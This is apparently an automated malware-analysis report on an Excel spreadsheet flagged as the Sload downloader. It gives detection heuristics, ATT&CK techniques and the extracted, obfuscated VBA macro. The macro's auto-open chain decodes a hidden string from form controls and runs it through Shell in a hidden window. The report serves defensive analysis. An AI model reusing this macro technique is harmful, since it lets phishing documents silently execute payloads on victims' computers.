Verdict: MALICIOUS (Risk Score 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro. The macro chain ends in a call to the VBA Shell() function (a critical heuristic), which executes an arbitrary command line: Workbook_Open writes a value into a form control, the control's Change event handlers decode a string from the form's other control values, and the decoded string is passed to Shell with window style 0 (hidden). This indicates the document is designed to download and execute a secondary payload upon opening. The ClamAV detection and the other heuristics further support its malicious nature.
Heuristics (6)

- ClamAV: Xls.Malware.Sload-6923033-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Sload-6923033-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.day.com/dam/1.0 (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3997 bytes |

SHA-256: 87171e1779179abfe63c074848c07903db13f8c026683c2ca148ccc924771d63
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
al = "al1"
al = "al2"
GetArrayLength al
al = "al3"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SIGSEGV"
Attribute VB_Base = "0{30419A45-03FD-4AE8-84ED-7E7A386D3D6B}{26C63B84-A2FA-45B2-9533-0B0105293B87}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub NO_UNIX_BACKTRACE_SUPPORT_Change()
post = 66
post = 76
post = 28
post = 5
post = 68
post = 22
post = 2
post = 44
post = 8
post = 89
post = 92
post = 27
post = 18
post = 48
mapped = SIGSEGV.NO_UNIX_BACKTRACE_SUPPORT
post = 68
post = 86
post = 78
post = 55
post = 23
post = 83
post = 66
post = 78
post = 50
post = 42
post = 67
post = 99
post = 58
post = 1
post = 37
post = 68
post = 37
Shell mapped, 0
post = 30
post = 59
post = 76
post = 2
post = 43
post = 64
post = 59
post = 6
post = 28
post = 48
post = 47
post = 19
post = 30
post = 10
post = 9
post = 43
post = 87
post = 66
post = 99
End Sub
Private Sub cfgfolder_Change()
libc
End Sub
Attribute VB_Name = "strchr"
Public Sub libc()
nh = ""
named SIGSEGV.fler, nh
SIGSEGV.must = nh
SIGSEGV.NO_UNIX_BACKTRACE_SUPPORT = SIGSEGV.must
End Sub
Attribute VB_Name = "declare7"
Sub named(License, ByRef educated)
educated = ""
pStackWalk64 = 1
available pStackWalk64, educated, License
End Sub
Sub available(ByRef doConvert, ByRef tries, symbolString)
see = Len(symbolString)
If doConvert <= see Then
gem = ""
getErrorMessages symbolString, doConvert, gem
dc = 1
dependency gem, dc
csa = ""
callstackArray dc - 1, csa
tries = tries + csa
doConvert = doConvert + 1
available doConvert, tries, symbolString
End If
End Sub
Sub getErrorMessages(ULONG, below, ByRef inline)
inline = Right(Left(ULONG, below), 1)
End Sub
Sub callstackArray(operation, ByRef redistribute)
redistribute = ""
If operation < 1 Then
getErrorMessages SIGSEGV.si_code, Len(SIGSEGV.si_code) + operation, redistribute
Else
getErrorMessages SIGSEGV.si_code, operation, redistribute
End If
End Sub
Sub NO_UNIX_SIGNAL_HANDLING(ByRef found, ByRef NULL7, fpSymGetSymFromAddr64)
If found < Len(SIGSEGV.si_code) Then
gem = ""
getErrorMessages SIGSEGV.si_code, found, gem
If fpSymGetSymFromAddr64 <> gem Then
found = found + 1
NO_UNIX_SIGNAL_HANDLING found, NULL7, fpSymGetSymFromAddr64
Else
NULL7 = found
End If
End If
End Sub
Sub dependency(fpSymGetSymFromAddr64, ByRef NULL7)
found = 1
NULL7 = 1
NO_UNIX_SIGNAL_HANDLING found, NULL7, fpSymGetSymFromAddr64
End Sub
Attribute VB_Name = "just"
Public Sub GetArrayLength(internal)
SIGSEGV.cfgfolder = internal
End Sub
```